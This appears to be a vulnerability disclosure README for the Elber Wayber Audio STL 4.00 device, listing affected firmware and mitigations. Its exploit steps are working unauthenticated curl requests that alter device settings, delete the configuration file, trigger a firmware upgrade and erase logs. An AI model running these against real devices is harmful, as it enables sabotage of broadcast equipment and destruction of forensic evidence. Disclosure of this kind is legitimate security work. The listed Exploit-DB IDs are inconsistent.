Elber Wayber Analog/Digital Audio STL4.00 - Device Config Disclosure
Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure
Overview
This repository documents an unauthenticated device configuration and client-side hidden functionality disclosure vulnerability in Elber Wayber Analog/Digital Audio STL 4.00.
- EDB-ID: 52072
- CVE: N/A
- EDB Verified: Yes
- Exploit Author: LiquidWorm
- Vendor: Elber S.r.l.
- Product Web Page: Elber S.r.l.
- Platform: Hardware
- Date: August 24, 2024
- Tested On:
- NBFM Controller
- embOS/IP
- Vulnerability discovered by: Gjoko 'LiquidWorm' Krsti / @zeroscience
Affected Versions
- Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
- Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
- Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
- Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
- Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
- Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
- Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)
Vulnerability Description
Elber Wayber Analog/Digital Audio STL 4.00 suffers from unauthenticated device configuration exposure and hidden client-side functionalities, allowing attackers to manipulate system configurations, erase logs, and initiate firmware upgrades without authentication.
Impact
- Unauthorized configuration changes
- Potential system compromise
- Loss of sensitive configuration data
- Log erasure preventing forensic investigation
Steps to Exploit
1. Modify Fan Configuration
curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Response: Configuration applied
2. Delete Configuration File
curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
Response: File delete successfully
3. Initiate Firmware Upgrade
curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Response: Upgrade launched Successfully
4. Erase System Logs
curl 'http://TARGET/json_data/erase_log.js?until=-2'
Response: Logs erased
| Parameter | Meaning |
|---|---|
until=0 | Erase all logs |
until=-2 | Erase logs from yesterday |
until=-8 | Erase last week's logs |
until=-15 | Erase last two weeks' logs |
until=-22 | Erase last three weeks' logs |
until=-31 | Erase last month's logs |
5. Modify RX Configuration
curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
Response: RX Config Applied Successfully
6. Reveal Hidden Factory Window & FPGA Upload (Console)
> cleber_show_factory_wnd()
Mitigation
To protect against this vulnerability, users should:
- Restrict network access to the device to trusted hosts only.
- Implement authentication and authorization for sensitive endpoints.
- Apply firmware updates when available.
- Regularly review logs to detect unauthorized changes.
References
- ExploitDB: 52075
- Advisory ID: ZSL-2024-5823
- Advisory URL: Zero Science Lab Advisory
Disclaimer
This repository is for educational and research purposes only. Exploiting this vulnerability on systems without authorization is illegal. The author and contributors are not responsible for any misuse of this information.